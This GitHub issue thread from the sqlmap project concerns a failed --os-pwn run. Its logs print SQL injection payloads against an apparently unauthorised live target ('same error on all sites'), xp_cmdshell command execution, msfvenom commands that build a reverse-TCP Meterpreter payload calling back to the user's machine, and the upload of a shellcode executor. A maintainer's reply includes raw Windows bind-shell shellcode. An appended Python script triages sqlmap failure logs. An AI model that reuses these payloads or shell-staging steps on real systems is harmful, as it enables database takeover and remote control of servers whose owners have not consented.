sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

failed to create the shellcode #2372

Closed aliyazal closed 7 years ago

aliyazal commented 7 years ago

Metasploit version:
Framework: 4.13.16-dev-d48ec09
Console : 4.13.16-dev-d48ec09

sqlmap latest version

root@myCloud:~/sqlmap# python sqlmap.py -u "**" -v3 --thread=10 --os-pwn --msf-path /root/metasploit-framework/

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:15:50

[20:15:50] [DEBUG] cleaning up configuration parameters
[20:15:50] [DEBUG] setting the HTTP timeout
[20:15:50] [DEBUG] creating HTTP requests opener object
[20:15:50] [DEBUG] setting the takeover out-of-band functionality
[20:15:50] [DEBUG] provided Metasploit Framework path '/root/metasploit-framework' is valid
[20:15:51] [INFO] resuming back-end DBMS 'microsoft sql server'
[20:15:51] [DEBUG] resolving hostname 'www.***.com'
[20:15:51] [INFO] testing connection to the target URL
[20:15:51] [DEBUG] declared web page charset 'utf-8'
[20:15:51] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:

Parameter: tips (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: tips=25' AND 6411=6411 AND 'yIGb'='yIGb&page=2
Vector: AND [INFERENCE]

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
Payload: tips=25' AND 3406 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3406=3406) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(107)+CHAR(113))) AND 'qMiX'='qMiX&page=2
Vector: AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: tips=25';WAITFOR DELAY '0:0:5'--&page=2
Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
Payload: tips=25' WAITFOR DELAY '0:0:5'--&page=2
Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

[20:15:51] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling

1
[20:17:52] [DEBUG] going to use 'C:/Program Files (x86)/Parallels/Plesk/Databases/MSSQL/MSSQL10_50.MSSQLSERVER/MSSQL/Log' as temporary files directory
[20:17:52] [INFO] testing if current user is DBA
[20:17:52] [DEBUG] resuming configuration option 'code' (200)
[20:17:52] [DEBUG] performed 0 queries in 0.01 seconds
[20:17:52] [DEBUG] creating a support table to write commands standard output to
[20:17:52] [PAYLOAD] 25';DROP TABLE sqlmapoutput--
[20:17:53] [WARNING] reflective value(s) found and filtering out
[20:17:53] [PAYLOAD] 25';CREATE TABLE sqlmapoutput(id INT PRIMARY KEY IDENTITY, data NVARCHAR(4000))--
[20:17:53] [INFO] testing if xp_cmdshell extended procedure is usable
[20:17:53] [PAYLOAD] 25';DECLARE @chss VARCHAR(8000);SET @chss=0x6563686f2031;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @chss--
[20:17:53] [PAYLOAD] 25' AND 3109 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(113)+(SELECT ISNULL(CAST(COUNT(data) AS NVARCHAR(4000)),CHAR(32)) FROM sqlmapoutput)+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(107)+CHAR(113))) AND 'eFUO'='eFUO
[20:17:54] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[20:17:54] [INFO] the SQL query used returns 1 entries
[20:17:54] [PAYLOAD] 25' AND 2551 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(113)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32))),1,1024) FROM sqlmapoutput WHERE id NOT IN (SELECT TOP 0 id FROM sqlmapoutput ORDER BY id) ORDER BY id)+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(107)+CHAR(113))) AND 'DMmn'='DMmn
[20:17:54] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[20:17:54] [DEBUG] performed 2 queries in 0.48 seconds
[20:17:54] [PAYLOAD] 25';DELETE FROM sqlmapoutput--
[20:17:54] [INFO] xp_cmdshell extended procedure is usable
[20:17:54] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
2
what is the local address? [Enter for '10.2.10.133' (detected)]
which local port number do you want to use? [48324]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
1
[20:21:26] [DEBUG] executing local command: /root/metasploit-framework/msfvenom -p windows/meterpreter/reverse_tcp_allports EXITFUNC=process LPORT=48324 LHOST=10.2.10.133 -a x86 -e x86/alpha_mixed -f raw BufferRegister=EAX > "/root/.sqlmap/output/www.*.com/tmpmjjcj"
[20:21:26] [INFO] creation in progress . quit unexpectedly with return code 1

[20:21:27] [CRITICAL] failed to create the shellcode (/usr/local/rvm/gems/ruby-2.1.8/gems/bundler-1.14.3/lib/bundler/spec_set.rb:87:in `block in materialize': Could not find rake-12.0.0 in any of the sources (Bundler::GemNotFound)
from /usr/local/rvm/gems/ruby-2.1.8/gems/bundler-1.14.3/lib/bundler/spec_set.rb:80:in `map!'
from /usr/local/rvm/gems/ruby-2.1.8/gems/bundler-1.14.3/lib/bundler/spec_set.rb:80:in `materialize'
from /usr/local/rvm/gems/ruby-2.1.8/gems/bundler-1.14.3/lib/bundler/definition.rb:176:in `specs'
from /usr/local/rvm/gems/ruby-2.1.8/gems/bundler-1.14.3/lib/bundler/definition.rb:235:in `specs_for'
from /usr/local/rvm/gems/ruby-2.1.8/gems/bundler-1.14.3/lib/bundler/definition.rb:224:in `requested_specs'
from /usr/local/rvm/gems/ruby-2.1.8/gems/bundler-1.14.3/lib/bundler/runtime.rb:118:in `block in definition_method'
from /usr/local/rvm/gems/ruby-2.1.8/gems/bundler-1.14.3/lib/bundler/runtime.rb:19:in `setup'
from /usr/local/rvm/gems/ruby-2.1.8/gems/bundler-1.14.3/lib/bundler.rb:100:in `setup'
from /usr/local/rvm/gems/ruby-2.1.8/gems/bundler-1.14.3/lib/bundler/setup.rb:20:in `<top (required)>'
from /usr/local/rvm/rubies/ruby-2.1.8/lib/ruby/site_ruby/2.1.0/rubygems/core_ext/kernel_require.rb:133:in `require'
from /usr/local/rvm/rubies/ruby-2.1.8/lib/ruby/site_ruby/2.1.0/rubygems/core_ext/kernel_require.rb:133:in `rescue in require'
from /usr/local/rvm/rubies/ruby-2.1.8/lib/ruby/site_ruby/2.1.0/rubygems/core_ext/kernel_require.rb:40:in `require'
from /root/metasploit-framework/config/boot.rb:26:in `<top (required)>'
from /usr/local/rvm/rubies/ruby-2.1.8/lib/ruby/site_ruby/2.1.0/rubygems/core_ext/kernel_require.rb:55:in `require'
from /usr/local/rvm/rubies/ruby-2.1.8/lib/ruby/site_ruby/2.1.0/rubygems/core_ext/kernel_require.rb:55:in `require'
from /root/metasploit-framework/lib/msfenv.rb:12:in `<top (required)>'
from /usr/local/rvm/rubies/ruby-2.1.8/lib/ruby/site_ruby/2.1.0/rubygems/core_ext/kernel_require.rb:55:in `require'
from /usr/local/rvm/rubies/ruby-2.1.8/lib/ruby/site_ruby/2.1.0/rubygems/core_ext/kernel_require.rb:55:in `require'
from /root/metasploit-framework/msfvenom:10:in ' )

[20:21:27] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 2 times

stamparm commented 7 years ago

This is a problem with the Metasploit installation. To debug it, try to run something like:

# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -f c
No encoder or badchars specified, outputting raw payload
Payload size: 299 bytes
unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x0b\x59\x50\xe2\xfd\x6a\x01\x6a"
"\x02\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89"
"\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x85\xc0\x75"
"\x58\x57\x68\xb7\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1"
"\xff\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x6a\x00\x6a\x04"
"\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x2d\x8b"
"\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
"\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f"
"\xff\xd5\x83\xf8\x00\x7e\x07\x01\xc3\x29\xc6\x75\xe9\xc3";

I guess that you'll have problems with it too (because of a bad Metasploit/Ruby installation), and until you sort it out, you'll have problems with sqlmap too.

aliyazal commented 7 years ago

My problem is solved. But I get the same error on all sites.

current user is DBA: True
ERROR:
[03:48:38] [DEBUG] executing local command: /root/metasploit-framework/msfvenom -p windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=23121 LHOST=10.2.83.75 -a x86 -e x86/alpha_mixed -f raw BufferRegister=EAX > "/root/.sqlmap/output/www.x.com/tmpmjuno"
[03:48:38] [INFO] creation in progress .................. done
[03:48:56] [DEBUG] the shellcode size is 360 bytes
[03:48:56] [INFO] uploading shellcodeexec to 'C:/Program Files (x86)/Parallels/Plesk/Databases/MSSQL/MSSQL10_50.MSSQLSERVER/MSSQL/Log/tmpsejuno.exe'
[03:48:56] [DEBUG] going to upload the file 'binary' with stacked query SQL injection technique
[03:48:56] [INFO] using PowerShell to write the binary file content to file 'C:\Program Files (x86)\Parallels\Plesk\Databases\MSSQL\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmpsejuno.exe'
[03:48:56] [DEBUG] uploading the base64-encoded file to C:\Program Files (x86)\Parallels\Plesk\Databases\MSSQL\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmpfqtvd.txt, please wait..
[03:48:56] [PAYLOAD] 25';DECLARE @pjec VARCHAR(8000);SET @pjec=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;EXEC master..xp_cmdshell @pjec--
[03:48:57] [CRITICAL] page not found (404)
[03:48:57] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 2 times, 500 (Internal Server Error) - 971 times
[03:48:57] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)

stamparm commented 7 years ago

You have 500 (Internal Server Error) - 971 times and are raising the issue :). Please don't open this kind of issue anymore. Too many 500s means that you should inspect what's going on on the web side, not sqlmap's side.
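The two diagnoses in this thread (a broken Ruby/Bundler environment behind msfvenom, and a run drowned in HTTP 500s that points at the web side rather than sqlmap) can both be read straight off sqlmap's own output. The script below is an added example, not part of the issue or of sqlmap's code: it parses the end-of-run HTTP error summary and the shellcode-creation failure and sorts a run into categories. The two log excerpts are constructed samples modelled on the output quoted above (shortened, not verbatim), and the threshold of 100 server errors is an assumption chosen for illustration.

```python
import re

# Constructed excerpts modelled on the sqlmap output quoted in this issue (not verbatim).
RUN_BROKEN_MSF = """\
[20:21:26] [INFO] creation in progress . quit unexpectedly with return code 1
[20:21:27] [CRITICAL] failed to create the shellcode (/usr/local/rvm/gems/ruby-2.1.8/gems/bundler-1.14.3/lib/bundler/spec_set.rb:87:in `block in materialize': Could not find rake-12.0.0 in any of the sources (Bundler::GemNotFound)
from /usr/local/rvm/gems/ruby-2.1.8/gems/bundler-1.14.3/lib/bundler/spec_set.rb:80:in `map!'
[20:21:27] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 2 times
"""

RUN_WEB_SIDE = """\
[03:48:56] [DEBUG] the shellcode size is 360 bytes
[03:48:57] [CRITICAL] page not found (404)
[03:48:57] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 2 times, 500 (Internal Server Error) - 971 times
[03:48:57] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
"""

# Bundler's "missing gem" message, as seen in the backtrace above.
GEM_NOT_FOUND = re.compile(r"Could not find (?P<gem>[\w.-]+) in any of the sources \(Bundler::GemNotFound\)")
# sqlmap's report that the local msfvenom process died.
MSF_EXIT = re.compile(r"quit unexpectedly with return code (?P<code>\d+)")
# sqlmap's end-of-run summary line and its "NNN (Reason) - N times" items.
HTTP_SUMMARY = re.compile(r"HTTP error codes detected during run: (?P<body>.+)")
HTTP_ITEM = re.compile(r"(?P<status>\d{3}) \([^)]*\) - (?P<count>\d+) times")


def parse_http_error_counts(log):
    """Return {status_code: count} from sqlmap's end-of-run warning line, or {} if it is absent."""
    m = HTTP_SUMMARY.search(log)
    if not m:
        return {}
    return {int(status): int(count) for status, count in HTTP_ITEM.findall(m.group("body"))}


def triage(log, server_error_threshold=100):
    """Sort an --os-pwn run into (category, advice) tuples; threshold is an assumed cut-off."""
    findings = []
    gem = GEM_NOT_FOUND.search(log)
    exit_code = MSF_EXIT.search(log)
    if gem:
        findings.append(("metasploit-environment",
                         "Bundler cannot resolve gem %s, so the Ruby/Metasploit install is broken; "
                         "repair it (e.g. 'bundle install' in the Metasploit directory) and confirm "
                         "msfvenom runs on its own before retrying sqlmap." % gem.group("gem")))
    elif exit_code:
        findings.append(("msfvenom-failure",
                         "msfvenom exited with code %s; run the logged msfvenom command by hand "
                         "to see its error." % exit_code.group("code")))
    counts = parse_http_error_counts(log)
    server_errors = sum(n for code, n in counts.items() if 500 <= code < 600)
    if server_errors >= server_error_threshold:
        findings.append(("web-side",
                         "%d server errors (5xx) during the run: the application or a WAF in front "
                         "of it is rejecting requests; inspect the web side, not sqlmap." % server_errors))
    if "page not found (404)" in log or "WAF/IPS/IDS" in log:
        findings.append(("protection-suspected",
                         "sqlmap itself reported 404s or WAF/IPS/IDS heuristics, so responses no "
                         "longer match the stored session baseline."))
    return findings


if __name__ == "__main__":
    for name, sample in (("broken msfvenom", RUN_BROKEN_MSF), ("web side", RUN_WEB_SIDE)):
        print("==", name)
        for category, advice in triage(sample):
            print("  [%s] %s" % (category, advice))
```

Feed it a saved sqlmap run (for example the `-v3` output redirected to a file) and the first category it prints is the one to fix first: a `metasploit-environment` finding means no amount of sqlmap tuning will help, while a `web-side` finding with hundreds of 5xx responses is exactly the case stamparm describes, where the target, not the tool, is the thing to look at.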